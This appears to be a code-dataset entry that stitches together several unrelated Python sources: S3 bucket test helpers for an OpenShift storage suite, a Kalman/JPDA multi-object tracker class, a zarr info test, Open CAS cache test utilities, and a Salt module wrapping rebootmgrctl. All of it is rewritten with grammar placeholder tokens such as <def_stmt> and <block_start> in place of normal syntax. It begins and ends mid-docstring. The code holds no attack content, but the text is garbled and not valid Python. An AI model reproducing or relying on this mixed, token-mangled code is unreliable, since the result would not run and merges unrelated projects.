mcg_obj (obj): An MCG object containing the MCG S3 connection credentials awscli_pod (pod): A pod running the AWSCLI tools bucket_factory: Calling this fixture creates a new bucket(s) """<line_sep>dir="/aws/"+uuid4().hex+"_original/"<line_sep>downloaded_files=retrieve_test_objects_to_pod(awscli_pod dir)<line_sep>bucket_name=bucket_factory(amount=1 interface="OC")[0].name<line_sep>mcg_bucket_path=f"s3://{bucket_name}/"<line_sep>uploaded_objects_paths=get_full_path_object(downloaded_files bucket_name)<line_sep>sync_object_directory(awscli_pod dir mcg_bucket_path mcg_obj)<line_sep>del_objects(uploaded_objects_paths awscli_pod mcg_obj)<line_sep>awscli_pod.exec_cmd_on_pod(command=f"rm -rf {dir}")<block_end><def_stmt>retrieve_verification_mode <block_start><if_stmt>config.ENV_DATA["platform"].lower()<eq>"ibm_cloud"<block_start>verify=<true><block_end><elif_stmt>config.DEPLOYMENT.get("use_custom_ingress_ssl_cert")<block_start>verify=get_root_ca_cert()<block_end><else_stmt><block_start>verify=constants.DEFAULT_INGRESS_CRT_LOCAL_PATH<block_end>logger.debug(f"verification: '{verify}'")<line_sep><return>verify<block_end><def_stmt>namespace_bucket_update mcg_obj bucket_name read_resource write_resource<block_start>""" Edits MCG namespace bucket resources Args: mcg_obj (obj): An MCG object containing the MCG S3 connection credentials bucket_name (str): Name of the bucket read_resource (list): Resource names to provide read access write_resource (str): Resource name to provide write access """<line_sep>mcg_obj.send_rpc_query("bucket_api" "update_bucket" {"name":bucket_name "namespace":{"read_resources":read_resource "write_resource":write_resource } } )<block_end><def_stmt>write_random_objects_in_pod io_pod file_dir amount pattern="ObjKey"<block_start>""" Uses /dev/urandom to create and write random files in a given directory in a pod Args: io_pod (ocs_ci.ocs.ocp.OCP): The pod object in which the files should be generated and written file_dir (str): A string describing the path in which to write the files to amount (int): The amount of files to generate pattern (str): The file name pattern to use Returns: list: A list with the names of all written objects """<line_sep>obj_lst=[]<for_stmt>i range(amount)<block_start>object_key=pattern+"-{}".format(i)<line_sep>obj_lst.append(object_key)<line_sep>io_pod.exec_cmd_on_pod(f"dd if=/dev/urandom of={file_dir}/{object_key} bs=1M count=1 status=none")<block_end><return>obj_lst<block_end><def_stmt>setup_base_objects awscli_pod original_dir result_dir amount=2<block_start>""" Prepares two directories and populate one of them with objects Args: awscli_pod (Pod): A pod running the AWS CLI tools original_dir (str): original directory name result_dir (str): result directory name amount (Int): Number of test objects to create """<line_sep>awscli_pod.exec_cmd_on_pod(command=f"mkdir {original_dir} {result_dir}")<line_sep>write_random_objects_in_pod(awscli_pod original_dir amount)<block_end><def_stmt>check_cached_objects_by_name mcg_obj bucket_name expected_objects_names=<none><block_start>""" Check if the names of cached objects in a cache bucket are as expected using rpc call Args: mcg_obj (MCG): An MCG object containing the MCG S3 connection credentials bucket_name (str): Name of the cache bucket expected_objects_names (list): Expected objects to be cached Returns: bool: True if all the objects exist in the cache as expected, False otherwise """<line_sep>res=mcg_obj.send_rpc_query("object_api" "list_objects" {"bucket":bucket_name } ).json()<line_sep>list_objects_res=[name["key"]<for>name res.get("reply").get("objects")]<if_stmt><not>expected_objects_names<block_start>expected_objects_names=[]<block_end><if_stmt>set(expected_objects_names)<eq>set(list_objects_res)<block_start>logger.info("Files cached as expected")<line_sep><return><true><block_end>logger.warning("Objects did not cache properly, \n"<concat>f"Expected: [{expected_objects_names}]\n"<concat>f"Cached: [{list_objects_res}]")<line_sep><return><false><block_end><def_stmt>wait_for_cache mcg_obj bucket_name expected_objects_names=<none><block_start>""" wait for existing cache bucket to cache all required objects Args: mcg_obj (MCG): An MCG object containing the MCG S3 connection credentials bucket_name (str): Name of the cache bucket expected_objects_names (list): Expected objects to be cached """<line_sep>sample=TimeoutSampler(timeout=60 sleep=10 func=check_cached_objects_by_name mcg_obj=mcg_obj bucket_name=bucket_name expected_objects_names=expected_objects_names )<if_stmt><not>sample.wait_for_func_status(result=<true>)<block_start>logger.error("Objects were not able to cache properly")<line_sep><raise>UnexpectedBehaviour<block_end><block_end><def_stmt>compare_directory awscli_pod original_dir result_dir amount=2<block_start>""" Compares object checksums on original and result directories Args: awscli_pod (pod): A pod running the AWS CLI tools original_dir (str): original directory name result_dir (str): result directory name amount (int): Number of test objects to create """<for_stmt>i range(amount)<block_start>file_name=f"ObjKey-{i}"<assert_stmt>verify_s3_object_integrity(original_object_path=f"{original_dir}/{file_name}" result_object_path=f"{result_dir}/{file_name}" awscli_pod=awscli_pod ) "Checksum comparision between original and result object failed"<block_end><block_end><def_stmt>s3_copy_object s3_obj bucketname source object_key<block_start>""" Boto3 client based copy object Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket source (str): Source object key. eg: '<bucket>/<key> object_key (str): Unique object Identifier for copied object Returns: dict : Copy object response """<line_sep><return>s3_obj.s3_client.copy_object(Bucket=bucketname CopySource=source Key=object_key)<block_end><def_stmt>s3_upload_part_copy s3_obj bucketname copy_source object_key part_number upload_id<block_start>""" Boto3 client based upload_part_copy operation Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket copy_source (str): Name of the source bucket and key name. {bucket}/{key} part_number (int): Part number upload_id (str): Upload Id object_key (str): Unique object Identifier for copied object Returns: dict : upload_part_copy response """<line_sep><return>s3_obj.s3_client.upload_part_copy(Bucket=bucketname CopySource=copy_source Key=object_key PartNumber=part_number UploadId=upload_id )<block_end><def_stmt>s3_get_object_acl s3_obj bucketname object_key<block_start>""" Boto3 client based get_object_acl operation Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier for copied object Returns: dict : get object acl response """<line_sep><return>s3_obj.s3_client.get_object_acl(Bucket=bucketname Key=object_key)<block_end><def_stmt>s3_head_object s3_obj bucketname object_key if_match=<none><block_start>""" Boto3 client based head_object operation to retrieve only metadata Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier for copied object if_match (str): Return the object only if its entity tag (ETag) is the same as the one specified, Returns: dict : head object response """<if_stmt>if_match<block_start><return>s3_obj.s3_client.head_object(Bucket=bucketname Key=object_key IfMatch=if_match)<block_end><else_stmt><block_start><return>s3_obj.s3_client.head_object(Bucket=bucketname Key=object_key)<block_end><block_end><def_stmt>s3_list_objects_v1 s3_obj bucketname prefix="" delimiter="" max_keys=1000 marker=""<block_start>""" Boto3 client based list object version1 Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket prefix (str): Limits the response to keys that begin with the specified prefix. delimiter (str): Character used to group keys. max_keys (int): Maximum number of keys returned in the response. Default 1,000 keys. marker (str): key to start with when listing objects in a bucket. Returns: dict : list object v1 response """<line_sep><return>s3_obj.s3_client.list_objects(Bucket=bucketname Prefix=prefix Delimiter=delimiter MaxKeys=max_keys Marker=marker )<block_end><def_stmt>s3_list_objects_v2 s3_obj bucketname prefix="" delimiter="" max_keys=1000 con_token="" fetch_owner=<false> <block_start>""" Boto3 client based list object version2 Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket prefix (str): Limits the response to keys that begin with the specified prefix. delimiter (str): Character used to group keys. max_keys (int): Maximum number of keys returned in the response. Default 1,000 keys. con_token (str): Token used to continue the list fetch_owner (bool): Unique object Identifier Returns: dict : list object v2 response """<line_sep><return>s3_obj.s3_client.list_objects_v2(Bucket=bucketname Prefix=prefix Delimiter=delimiter MaxKeys=max_keys ContinuationToken=con_token FetchOwner=fetch_owner )<block_end><def_stmt>s3_delete_objects s3_obj bucketname object_keys<block_start>""" Boto3 client based delete objects Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_keys (list): The objects to delete. Format: {'Key': 'object_key', 'VersionId': ''} Returns: dict : delete objects response """<line_sep><return>s3_obj.s3_client.delete_objects(Bucket=bucketname Delete={"Objects":object_keys})<block_end><def_stmt>bucket_read_api mcg_obj bucket_name<block_start>""" Fetches the bucket metadata like size, tiers etc Args: mcg_obj (obj): MCG object bucket_name (str): Name of the bucket Returns: dict : Bucket policy response """<line_sep>resp=mcg_obj.send_rpc_query("bucket_api" "read_bucket" params={"name":bucket_name})<line_sep>bucket_read_resp=resp.json().get("reply")<line_sep><return>bucket_read_resp<block_end><def_stmt>get_bucket_available_size mcg_obj bucket_name<block_start>""" Function to get the bucket available size Args: mcg_obj (obj): MCG object bucket_name (str): Name of the bucket Returns: int : Available size in the bucket """<line_sep>resp=bucket_read_api(mcg_obj bucket_name)<line_sep>bucket_size=resp["storage"]["values"]["free"]<line_sep><return>bucket_size<block_end><def_stmt>compare_bucket_object_list mcg_obj first_bucket_name second_bucket_name<block_start>""" Compares the object lists of two given buckets Args: mcg_obj (MCG): An initialized MCG object first_bucket_name (str): The name of the first bucket to compare second_bucket_name (str): The name of the second bucket to compare Returns: bool: True if both buckets contain the same object names in all objects, False otherwise """<def_stmt>_comparison_logic <block_start>first_bucket_object_set={obj.key<for>obj mcg_obj.s3_list_all_objects_in_bucket(first_bucket_name)}<line_sep>second_bucket_object_set={obj.key<for>obj mcg_obj.s3_list_all_objects_in_bucket(second_bucket_name)}<if_stmt>first_bucket_object_set<eq>second_bucket_object_set<block_start>logger.info("Objects in both buckets are identical")<line_sep><return><true><block_end><else_stmt><block_start>logger.warning(f"""Buckets {first_bucket_name} and {second_bucket_name} do not contain the same objects. {first_bucket_name} objects: {first_bucket_object_set} {second_bucket_name} objects: {second_bucket_object_set} """)<line_sep><return><false><block_end><block_end><try_stmt><block_start><for_stmt>comparison_result TimeoutSampler(600 30 _comparison_logic)<block_start><if_stmt>comparison_result<block_start><return><true><block_end><block_end><block_end><except_stmt>TimeoutExpiredError<block_start>logger.error("The compared buckets did not contain the same set of objects after ten minutes")<line_sep><return><false><block_end><block_end><def_stmt>write_random_test_objects_to_bucket io_pod bucket_to_write file_dir amount=1 mcg_obj=<none> s3_creds=<none> <block_start>""" Write files generated by /dev/urandom to a bucket Args: io_pod (ocs_ci.ocs.ocp.OCP): The pod which should handle all needed IO operations bucket_to_write (str): The bucket name to write the random files to file_dir (str): The path to the folder where all random files will be generated and copied from amount (int, optional): The amount of random objects to write. Defaults to 1. mcg_obj (MCG, optional): An MCG class instance s3_creds (dict, optional): A dictionary containing S3-compatible credentials for writing objects directly to buckets outside of the MCG. Defaults to None. Returns: list: A list containing the names of the random files that were written """<line_sep>full_object_path=f"s3://{bucket_to_write}"<line_sep>obj_lst=write_random_objects_in_pod(io_pod file_dir amount)<line_sep>sync_object_directory(io_pod file_dir full_object_path s3_obj=mcg_obj signed_request_creds=s3_creds )<line_sep><return>obj_lst<block_end>
# vim: expandtab:ts=4:sw=4 <import_from_future_stmt> absolute_import<import_stmt>numpy<as>np<import_stmt>pdb<import_from_stmt>. kf_2d kf_3d double_measurement_kf imm<import_from_stmt>. linear_assignment<import_from_stmt>. iou_matching<import_from_stmt>.track Track<import_from_stmt>. JPDA_matching<import_from_stmt>. tracking_utils<import_stmt>math<import_from_stmt>nn_matching NearestNeighborDistanceMetric<import_stmt>cv2<class_stmt>Tracker<block_start>""" This is the multi-target tracker. Parameters ---------- metric : nn_matching.NearestNeighborDistanceMetric A distance metric for measurement-to-track association. max_age : int Maximum number of missed misses before a track is deleted. n_init : int Number of consecutive detections before the track is confirmed. The track state is set to `Deleted` if a miss occurs within the first `n_init` frames. Attributes ---------- metric : nn_matching.NearestNeighborDistanceMetric The distance metric used for measurement to track association. max_age : int Maximum number of missed misses before a track is deleted. n_init : int Number of frames that a track remains in initialization phase. kf : EKF.KalmanFilter A Kalman filter to filter target trajectories in image space. tracks : List[Track] The list of active tracks at the current time step. """<def_stmt>__init__ self max_age=5 n_init=3 JPDA=<false> m_best_sol=1 assn_thresh=0.0 matching_strategy=<none> kf_appearance_feature=<none> gate_full_state=<false> lstm=<none> cuda=<false> appearance_model=<none> calib=<none> kf_vel_params=(1./20 1./160 1 1 2) dummy_node_cost_iou=0.4 dummy_node_cost_app=0.2 nn_budget=<none> use_imm=<false> kf_walk_params=(1./20 1./160 1 1 2) markov=(0.9 0.7) uncertainty_limit=1.8 optical_flow=<false> gate_limit=400<block_start>self.max_age=max_age<line_sep>self.n_init=n_init<line_sep>self.metric=NearestNeighborDistanceMetric("euclidean" nn_budget)<if_stmt><not>use_imm<block_start>self.kf=kf_2d.KalmanFilter2D(*kf_vel_params gate_limit)<line_sep>self.use_imm=<false><block_end><else_stmt><block_start>self.kf=imm.IMMFilter2D(kf_vel_params kf_walk_params markov=markov)<line_sep>self.use_imm=<true><block_end>self.tracks=[]<line_sep>self._next_id=1<line_sep>self.JPDA=JPDA<line_sep>self.m_best_sol=m_best_sol<line_sep>self.assn_thresh=assn_thresh<line_sep>self.matching_strategy=matching_strategy<line_sep>self.kf_appearance_feature=kf_appearance_feature<line_sep>self.gate_only_position=<not>gate_full_state<line_sep>self.lstm=lstm<line_sep>self.cuda=cuda<line_sep>self.dummy_node_cost_app=dummy_node_cost_app<line_sep>self.dummy_node_cost_iou=dummy_node_cost_iou<line_sep>self.appearance_model=appearance_model<line_sep>self.prev_frame=<none><line_sep>self.uncertainty_limit=uncertainty_limit<line_sep>self.optical_flow=optical_flow<block_end># @profile <def_stmt>gated_metric self tracks dets track_indices detection_indices compare_2d=<false><block_start>targets=np.array([tracks[i].track_id<for>i track_indices])<if_stmt><not>compare_2d<and>self.metric.check_samples(targets)<block_start>compare_2d=<true><block_end><if_stmt>compare_2d<block_start>features=np.array([dets[i].appearance_feature<for>i detection_indices])<block_end><else_stmt><block_start>features=np.array([dets[i].feature<for>i detection_indices])<block_end>#cost_matrix = self.metric.distance(features, targets, compare_2d) cost_matrix_appearance=self.metric.distance_torch(features targets compare_2d)<line_sep>cost_matrix_iou=iou_matching.iou_cost(tracks dets track_indices detection_indices)<line_sep>gate_mask=linear_assignment.gate_cost_matrix(self.kf tracks dets track_indices detection_indices only_position=self.gate_only_position)<line_sep>cost_matrix=np.dstack((cost_matrix_appearance cost_matrix_iou))<line_sep><return>cost_matrix gate_mask<block_end><def_stmt>predict self<block_start>"""Propagate track state distributions one time step forward. This function should be called once every time step, before `update`. """<for_stmt>track self.tracks<block_start>track.predict(self.kf)<block_end><block_end># @profile <def_stmt>update self cur_frame detections compare_2d=<false><block_start>"""Perform measurement update and track management. Parameters ---------- detections : List[deep_sort.detection.Detection] A list of detections at the current time step. """<line_sep>self.cur_frame=cv2.cvtColor((255<times>cur_frame).permute(1 2 0).cpu().numpy() cv2.COLOR_BGR2GRAY)<line_sep>matches,unmatched_tracks,unmatched_detections=self._match(detections compare_2d)<line_sep># update filter for each assigned track # Only do this for non-JPDA because in JPDA the kf states are updated # during the matching process <if_stmt><not>self.JPDA# Map matched tracks to detections <block_start>track_detection_map={t:d<for>(t d) matches}<line_sep># Map unmatched tracks to -1 for no detection <for_stmt>t unmatched_tracks<block_start>track_detection_map[t]=-1<block_end><for_stmt>track_idx,detection_idx matches<block_start>self.tracks[track_idx].update(self.kf detections detection_idx=detection_idx JPDA=self.JPDA cur_frame=self.cur_frame appearance_model=self.appearance_model lstm=self.lstm)<block_end><block_end># update track state for unmatched tracks <for_stmt>track_idx unmatched_tracks<block_start>self.tracks[track_idx].mark_missed()<block_end># create new tracks self.prune_tracks()<line_sep>flow=<none><if_stmt>unmatched_detections<block_start><if_stmt>self.optical_flow<and>self.prev_frame<is><not><none><block_start>flow=cv2.calcOpticalFlowFarneback(self.prev_frame self.cur_frame <none> 0.5 3 15 3 5 1.2 0)<block_end><block_end><for_stmt>detection_idx unmatched_detections<block_start>self._initiate_track(detections[detection_idx] flow)<block_end># Update distance metric. active_targets=[t.track_id<for>t self.tracks]<line_sep>features,features_2d,targets,targets_2d=[] [] [] []<for_stmt>track self.tracks<block_start>features<augadd>track.features<line_sep>features_2d<augadd>track.features_2d<line_sep>targets<augadd>[track.track_id<for>_ track.features]<line_sep>targets_2d<augadd>[track.track_id<for>_ track.features_2d]<line_sep>track.features=[]<line_sep>track.features_2d=[]<block_end>self.metric.partial_fit(np.asarray(features) np.asarray(features_2d) np.asarray(targets) np.asarray(targets_2d) active_targets)<line_sep>self.prev_frame=self.cur_frame<block_end># @profile <def_stmt>_match self detections compare_2d# Associate all tracks using combined cost matrices. <block_start><if_stmt>self.JPDA# Run JPDA on all tracks <block_start>marginalizations=linear_assignment.JPDA(self.gated_metric self.dummy_node_cost_app self.dummy_node_cost_iou self.tracks detections m=self.m_best_sol compare_2d=compare_2d)<line_sep># for track in self.tracks: #TODO: REMOVE # print(track.track_id) # print(marginalizations) jpda_matcher=JPDA_matching.Matcher(detections marginalizations range(len(self.tracks)) self.matching_strategy assignment_threshold=self.assn_thresh)<line_sep>matches_a,unmatched_tracks_a,unmatched_detections=jpda_matcher.match()<line_sep># Map matched tracks to detections # Map matched tracks to detections track_detection_map={t:d<for>(t d) matches_a}<line_sep># Map unmatched tracks to -1 for no detection <for_stmt>t unmatched_tracks_a<block_start>track_detection_map[t]=-1<block_end># update Kalman state <if_stmt>marginalizations.shape[0]<g>0<block_start><for_stmt>i range(len(self.tracks))<block_start>self.tracks[i].update(self.kf detections marginalization=marginalizations[i :] detection_idx=track_detection_map[i] JPDA=self.JPDA cur_frame=self.cur_frame appearance_model=self.appearance_model lstm=self.lstm)<block_end><block_end><block_end><else_stmt><block_start>confirmed_tracks=[i<for>i,t enumerate(self.tracks)<if>t.is_confirmed()]<line_sep>matches_a,unmatched_tracks_a,unmatched_detections=linear_assignment.matching_cascade(self.gated_metric self.dummy_node_cost_iou self.max_age self.tracks detections confirmed_tracks compare_2d=compare_2d)<block_end><return>matches_a unmatched_tracks_a unmatched_detections<block_end><def_stmt>_initiate_track self detection flow=<none><block_start><if_stmt>self.use_imm<block_start>mean,covariance,model_probabilities=self.kf.initiate(detection.to_xywh() flow)<block_end><else_stmt><block_start>mean,covariance=self.kf.initiate(detection.to_xywh() flow)<line_sep>model_probabilities=<none><block_end>self.tracks.append(Track(mean covariance model_probabilities self._next_id self.n_init self.max_age kf_appearance_feature=self.kf_appearance_feature feature=detection.feature appearance_feature=detection.appearance_feature cuda=self.cuda lstm=self.lstm last_det=detection))<line_sep>self._next_id<augadd>1<block_end><def_stmt>prune_tracks self<block_start>h,w=self.cur_frame.shape<for_stmt>track self.tracks# Check if track is leaving <block_start><if_stmt>self.use_imm<block_start>predicted_mean,predicted_cov=self.kf.combine_states(track.mean track.covariance track.model_probabilities)#TODO: This doesn't predict. Mean should def predict <block_end><else_stmt><block_start>predicted_mean=self.kf.predict_mean(track.mean)<line_sep>predicted_cov=track.covariance<block_end>predicted_pos=predicted_mean[:2]<line_sep>predicted_vel=predicted_mean[4:6]<line_sep>predicted_pos[0]<augsub>w/2<line_sep>predicted_pos[1]<augsub>h/2<line_sep>cos_theta=np.dot(predicted_pos predicted_vel)/(np.linalg.norm(predicted_pos)<times>np.linalg.norm(predicted_vel)+1e-6)<line_sep>predicted_pos[0]<augadd>w/2<line_sep>predicted_pos[1]<augadd>h/2<line_sep># Thresholds for deciding whether track is outside image BORDER_VALUE=0<if_stmt>(cos_theta<g>0<and>(predicted_pos[0]-track.mean[2]/2<le>BORDER_VALUE<or>predicted_pos[0]+track.mean[2]/2<ge>w-BORDER_VALUE))<block_start><if_stmt>track.is_exiting()<and><not>track.matched<block_start>track.delete_track()<block_end><else_stmt><block_start>track.mark_exiting()<block_end><block_end># Check if track is too uncertain # cov_axis,_ = np.linalg.eigh(predicted_cov) # if np.abs(np.sqrt(cov_axis[-1]))*6 > self.uncertainty_limit*np.linalg.norm(predicted_mean[2:4]): # track.delete_track() <block_end>self.tracks=[t<for>t self.tracks<if><not>t.is_deleted()]<block_end><block_end>
<import_stmt>numcodecs<import_stmt>pytest<import_stmt>zarr<import_from_stmt>zarr.util InfoReporter<line_sep>@pytest.mark.parametrize('array_size' [10 15000])<def_stmt>test_info array_size# setup <block_start>g=zarr.group(store=dict() chunk_store=dict() synchronizer=zarr.ThreadSynchronizer())<line_sep>g.create_group('foo')<line_sep>z=g.zeros('bar' shape=array_size filters=[numcodecs.Adler32()])<line_sep># test group info items=g.info_items()<line_sep>keys=sorted([k<for>k,_ items])<line_sep>expected_keys=sorted(['Type' 'Read-only' 'Synchronizer type' 'Store type' 'Chunk store type' 'No. members' 'No. arrays' 'No. groups' 'Arrays' 'Groups' 'Name'])<assert_stmt>expected_keys<eq>keys<line_sep># can also get a string representation of info via the info attribute <assert_stmt>isinstance(g.info InfoReporter)<assert_stmt>"Type"<in>repr(g.info)<line_sep># test array info items=z.info_items()<line_sep>keys=sorted([k<for>k,_ items])<line_sep>expected_keys=sorted(['Type' 'Data type' 'Shape' 'Chunk shape' 'Order' 'Read-only' 'Filter [0]' 'Compressor' 'Synchronizer type' 'Store type' 'Chunk store type' 'No. bytes' 'No. bytes stored' 'Storage ratio' 'Chunks initialized' 'Name'])<assert_stmt>expected_keys<eq>keys<line_sep># can also get a string representation of info via the info attribute <assert_stmt>isinstance(z.info InfoReporter)<assert_stmt>"Type"<in>repr(z.info)<block_end>
# # Copyright(c) 2019-2021 Intel Corporation # SPDX-License-Identifier: BSD-3-Clause-Clear # <import_from_stmt>api.cas casadm<import_from_stmt>api.cas ioclass_config<import_from_stmt>api.cas.cache_config CacheLineSize CacheMode CleaningPolicy SeqCutOffPolicy <import_from_stmt>core.test_run TestRun<import_from_stmt>test_tools.dd Dd<import_from_stmt>test_tools.fio.fio Fio<import_from_stmt>test_tools.fio.fio_param ReadWrite IoEngine<import_from_stmt>test_utils.os_utils Udev sync<import_from_stmt>test_utils.os_utils drop_caches DropCachesMode<import_from_stmt>test_utils.size Size Unit<line_sep>ioclass_config_path="/tmp/opencas_ioclass.conf"<line_sep>mountpoint="/tmp/cas1-1"<def_stmt>prepare cache_size=Size(10 Unit.GibiByte) core_size=Size(40 Unit.GibiByte) cache_mode=CacheMode.WB cache_line_size=CacheLineSize.LINE_4KiB default_allocation="0.00"<block_start>ioclass_config.remove_ioclass_config()<line_sep>cache_device=TestRun.disks["cache"]<line_sep>core_device=TestRun.disks["core"]<line_sep>cache_device.create_partitions([cache_size])<line_sep>core_device.create_partitions([core_size])<line_sep>cache_device=cache_device.partitions[0]<line_sep>core_device=core_device.partitions[0]<line_sep>TestRun.LOGGER.info(f"Starting cache")<line_sep>cache=casadm.start_cache(cache_device cache_mode=cache_mode cache_line_size=cache_line_size force=<true>)<line_sep>Udev.disable()<line_sep>TestRun.LOGGER.info(f"Setting cleaning policy to NOP")<line_sep>casadm.set_param_cleaning(cache_id=cache.cache_id policy=CleaningPolicy.nop)<line_sep>TestRun.LOGGER.info(f"Adding core device")<line_sep>core=casadm.add_core(cache core_dev=core_device)<line_sep>TestRun.LOGGER.info(f"Setting seq cutoff policy to never")<line_sep>core.set_seq_cutoff_policy(SeqCutOffPolicy.never)<line_sep>ioclass_config.create_ioclass_config(add_default_rule=<false> ioclass_config_path=ioclass_config_path)<line_sep># To make test more precise all workload except of tested ioclass should be # put in pass-through mode ioclass_config.add_ioclass(ioclass_id=ioclass_config.DEFAULT_IO_CLASS_ID eviction_priority=ioclass_config.DEFAULT_IO_CLASS_PRIORITY allocation=default_allocation rule=ioclass_config.DEFAULT_IO_CLASS_RULE ioclass_config_path=ioclass_config_path )<line_sep>output=TestRun.executor.run(f"mkdir -p {mountpoint}")<if_stmt>output.exit_code<ne>0<block_start><raise>Exception(f"Failed to create mountpoint")<block_end><return>cache core<block_end><def_stmt>get_io_class_occupancy cache io_class_id percent=<false><block_start><return>get_io_class_usage(cache io_class_id percent).occupancy<block_end><def_stmt>get_io_class_dirty cache io_class_id<block_start><return>get_io_class_usage(cache io_class_id).dirty<block_end><def_stmt>get_io_class_usage cache io_class_id percent=<false><block_start><return>cache.get_io_class_statistics(io_class_id=io_class_id percentage_val=percent).usage_stats<block_end><def_stmt>run_io_dir path size_4k offset=0<block_start>dd=(Dd().input("/dev/zero").output(f"{path}").count(size_4k).block_size(Size(1 Unit.Blocks4096)).seek(offset))<line_sep>TestRun.LOGGER.info(f"{dd}")<line_sep>output=dd.run()<if_stmt>output.exit_code<ne>0<block_start>TestRun.fail(f"Failed to execute dd.\n {output.stdout}\n{output.stderr}")<block_end>sync()<line_sep>drop_caches(DropCachesMode.ALL)<block_end><def_stmt>run_io_dir_read path<block_start>dd=Dd().output("/dev/null").input(f"{path}")<line_sep>output=dd.run()<if_stmt>output.exit_code<ne>0<block_start>TestRun.fail(f"Failed to execute dd.\n {output.stdout}\n{output.stderr}")<block_end>sync()<line_sep>drop_caches(DropCachesMode.ALL)<block_end><def_stmt>run_fio_count core blocksize num_ios<block_start>(Fio().create_command().target(core).io_engine(IoEngine.libaio).read_write(ReadWrite.randread).block_size(blocksize).direct().file_size(Size(10 Unit.GibiByte)).num_ios(num_ios).run())<block_end>
""" :maintainer: <NAME> <<EMAIL>> :maturity: new :depends: None :platform: Linux .. versionadded:: 3004 """<import_stmt>logging<import_stmt>re<import_stmt>salt.exceptions<line_sep>log=logging.getLogger(__name__)<def_stmt>__virtual__ <block_start>"""rebootmgrctl command is required."""<if_stmt>__utils__["path.which"]("rebootmgrctl")<is><not><none><block_start><return><true><block_end><else_stmt><block_start><return>(<false> "Module rebootmgt requires the command rebootmgrctl")<block_end><block_end><def_stmt>_cmd cmd retcode=<false><block_start>"""Utility function to run commands."""<line_sep>result=__salt__["cmd.run_all"](cmd)<if_stmt>retcode<block_start><return>result["retcode"]<block_end><if_stmt>result["retcode"]<block_start><raise>salt.exceptions.CommandExecutionError(result["stderr"])<block_end><return>result["stdout"]<block_end><def_stmt>version <block_start>"""Return the version of rebootmgrd CLI Example: .. code-block:: bash salt microos rebootmgr version """<line_sep>cmd=["rebootmgrctl" "--version"]<line_sep><return>_cmd(cmd).split()[-1]<block_end><def_stmt>is_active <block_start>"""Check if the rebootmgrd is running and active or not. CLI Example: .. code-block:: bash salt microos rebootmgr is_active """<line_sep>cmd=["rebootmgrctl" "is_active" "--quiet"]<line_sep><return>_cmd(cmd retcode=<true>)<eq>0<block_end><def_stmt>reboot order=<none><block_start>"""Tells rebootmgr to schedule a reboot. With the [now] option, a forced reboot is done, no lock from etcd is requested and a set maintenance window is ignored. With the [fast] option, a lock from etcd is requested if needed, but a defined maintenance window is ignored. order If specified, can be "now" or "fast" CLI Example: .. code-block:: bash salt microos rebootmgr reboot salt microos rebootmgt reboot order=now """<if_stmt>order<and>order<not><in>("now" "fast")<block_start><raise>salt.exceptions.CommandExecutionError("Order parameter, if specified, must be 'now' or 'fast'")<block_end>cmd=["rebootmgrctl" "reboot"]<if_stmt>order<block_start>cmd.append(order)<block_end><return>_cmd(cmd)<block_end><def_stmt>cancel <block_start>"""Cancels an already running reboot. CLI Example: .. code-block:: bash salt microos rebootmgr cancel """<line_sep>cmd=["rebootmgrctl" "cancel"]<line_sep><return>_cmd(cmd)<block_end><def_stmt>status <block_start>"""Returns the current status of rebootmgrd. Valid returned values are: 0 - No reboot requested 1 - Reboot requested 2 - Reboot requested, waiting for maintenance window 3 - Reboot requested, waiting for etcd lock. CLI Example: .. code-block:: bash salt microos rebootmgr status """<line_sep>cmd=["rebootmgrctl" "status" "--quiet"]<line_sep><return>_cmd(cmd retcode=<true>)<block_end><def_stmt>set_strategy strategy=<none><block_start>"""A new strategy to reboot the machine is set and written into /etc/rebootmgr.conf. strategy If specified, must be one of those options: best-effort - This is the default strategy. If etcd is running, etcd-lock is used. If no etcd is running, but a maintenance window is specified, the strategy will be maint-window. If no maintenance window is specified, the machine is immediately rebooted (instantly). etcd-lock - A lock at etcd for the specified lock-group will be acquired before reboot. If a maintenance window is specified, the lock is only acquired during this window. maint-window - Reboot does happen only during a specified maintenance window. If no window is specified, the instantly strategy is followed. instantly - Other services will be informed that a reboot will happen. Reboot will be done without getting any locks or waiting for a maintenance window. off - Reboot requests are temporary ignored. /etc/rebootmgr.conf is not modified. CLI Example: .. code-block:: bash salt microos rebootmgr set_strategy stragegy=off """<if_stmt>strategy<and>strategy<not><in>("best-effort" "etcd-lock" "maint-window" "instantly" "off" )<block_start><raise>salt.exceptions.CommandExecutionError("Strategy parameter not valid")<block_end>cmd=["rebootmgrctl" "set-strategy"]<if_stmt>strategy<block_start>cmd.append(strategy)<block_end><return>_cmd(cmd)<block_end><def_stmt>get_strategy <block_start>"""The currently used reboot strategy of rebootmgrd will be printed. CLI Example: .. code-block:: bash salt microos rebootmgr get_strategy """<line_sep>cmd=["rebootmgrctl" "get-strategy"]<line_sep><return>_cmd(cmd).split(":")[-1].strip()<block_end><def_stmt>set_window time duration<block_start>"""Set's the maintenance window. time The format of time is the same as described in systemd.time(7). duration The format of duration is "[XXh][YYm]". CLI Example: .. code-block:: bash salt microos rebootmgr set_window time="Thu,Fri 2020-*-1,5 11:12:13" duration=1h """<line_sep>cmd=["rebootmgrctl" "set-window" time duration]<line_sep><return>_cmd(cmd)<block_end><def_stmt>get_window <block_start>"""The currently set maintenance window will be printed. CLI Example: .. code-block:: bash salt microos rebootmgr get_window """<line_sep>cmd=["rebootmgrctl" "get-window"]<line_sep>window=_cmd(cmd)<line_sep><return>dict(zip(("time" "duration") re.search(r"Maintenance window is set to (.*), lasting (.*)." window).groups() ))<block_end><def_stmt>set_group group<block_start>"""Set the group, to which this machine belongs to get a reboot lock from etcd. group Group name CLI Example: .. code-block:: bash salt microos rebootmgr set_group group=group_1 """<line_sep>cmd=["rebootmgrctl" "set-group" group]<line_sep><return>_cmd(cmd)<block_end><def_stmt>get_group <block_start>"""The currently set lock group for etcd. CLI Example: .. code-block:: bash salt microos rebootmgr get_group """<line_sep>cmd=["rebootmgrctl" "get-group"]<line_sep>group=_cmd(cmd)<line_sep><return>re.search(r"Etcd lock group is set to (.*)" group).groups()[0]<block_end><def_stmt>set_max max_locks group=<none><block_start>"""Set the maximal number of hosts in a group, which are allowed to reboot at the same time. number Maximal number of hosts in a group group 